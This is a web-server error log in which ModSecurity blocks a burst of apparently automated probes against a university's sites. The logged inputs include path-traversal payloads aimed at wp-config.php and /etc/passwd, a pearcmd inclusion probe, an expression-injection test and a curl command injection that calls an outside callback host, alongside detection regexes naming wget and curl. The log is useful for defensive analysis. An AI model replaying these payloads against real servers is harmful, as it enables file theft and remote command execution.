[Tue Aug 29 11:39:12.467245 2023] [:error] [pid 1684] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaULdkAAAAh"]
[Tue Aug 29 11:39:12.478077 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAaJJr8AAAAJ"]
[Tue Aug 29 11:39:12.585416 2023] [:error] [pid 1691] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAab9TYAAAAV"]
[Tue Aug 29 11:39:13.120214 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAXA9oUAAAAO"]
[Tue Aug 29 11:39:13.229054 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAakQSwAAAAr"]
[Tue Aug 29 11:39:13.348289 2023] [:error] [pid 1702] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAamaooAAAAt"]
[Tue Aug 29 11:39:13.366956 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAagExoAAAAn"]
[Tue Aug 29 11:39:13.418333 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAaHMU4AAAAE"]
[Tue Aug 29 11:39:14.346622 2023] [:error] [pid 1679] [client 114.5.253.31] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.253.83_503e2fdc64254823cb9f81e3b3d879e8c6f416b6"): Internal error [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZO12ccCo-f0AAAaPj5oAAAAa"]
[Tue Aug 29 11:39:16.371620 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12dMCo-f0AAAafEtkAAAAW"]
[Tue Aug 29 11:39:16.375787 2023] [:error] [pid 1729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12dMCo-f0AAAbB7tIAAAAu"]
[Tue Aug 29 11:39:16.382182 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12dMCo-f0AAAXQKDcAAAAj"]
[Tue Aug 29 11:39:16.396519 2023] [:error] [pid 1672] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12dMCo-f0AAAaIwwsAAAAH"]
[Tue Aug 29 11:39:18.690143 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAaW4J4AAAAk"]
[Tue Aug 29 11:39:18.698382 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXbcDAAAAAL"]
[Tue Aug 29 11:39:22.359222 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12esCo-f0AAAbo-YMAAAAi"]
[Tue Aug 29 11:39:22.372329 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12esCo-f0AAAaa-V0AAAAp"]
[Tue Aug 29 11:39:23.531514 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAagEzoAAAAn"]
[Tue Aug 29 11:39:23.535505 2023] [:error] [pid 1701] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAalitAAAAAs"]
[Tue Aug 29 11:39:23.562577 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAYlCPUAAAAP"]
[Tue Aug 29 11:39:23.567702 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAaW4LoAAAAk"]
[Tue Aug 29 11:39:23.571201 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAXVy0EAAAAB"]
[Tue Aug 29 11:39:28.530198 2023] [:error] [pid 1779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12gMCo-f0AAAbz2n8AAAAe"]
[Tue Aug 29 11:39:29.403499 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12gcCo-f0AAAaJJvcAAAAJ"]
[Tue Aug 29 11:39:36.519666 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXVy2MAAAAB"]
[Tue Aug 29 11:39:36.543567 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAaa-Z0AAAAp"]
[Tue Aug 29 11:39:36.549533 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAafExgAAAAW"]
[Tue Aug 29 11:39:36.671219 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAafEx0AAAAW"]
[Tue Aug 29 11:39:36.716192 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAafEx8AAAAW"]
[Tue Aug 29 11:39:42.557423 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12jsCo-f0AAAXVy3kAAAAB"]
[Tue Aug 29 11:39:48.034723 2023] [:error] [pid 1778] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAby8XIAAAAN"]
[Tue Aug 29 11:39:48.390545 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAYb54QAAAAI"]
[Tue Aug 29 11:39:48.392455 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAXbcIwAAAAL"]
[Tue Aug 29 11:39:48.401176 2023] [:error] [pid 1778] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAby8XUAAAAN"]
[Tue Aug 29 11:39:48.411088 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAYb54UAAAAI"]
[Tue Aug 29 11:39:51.539166 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12l8Co-f0AAAYh9cMAAAAK"]
[Tue Aug 29 11:39:56.374638 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAYb540AAAAI"]
[Tue Aug 29 11:39:56.440042 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaJJ2MAAAAJ"]
[Tue Aug 29 11:39:56.443619 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaO3fUAAAAX"]
[Tue Aug 29 11:39:56.444673 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaHMd8AAAAE"]
[Tue Aug 29 11:39:56.482159 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAXQKJoAAAAj"]
[Tue Aug 29 11:40:02.438383 2023] [:error] [pid 1793] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gq7pcwbepen5uc.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcBbXkAAAAH"]
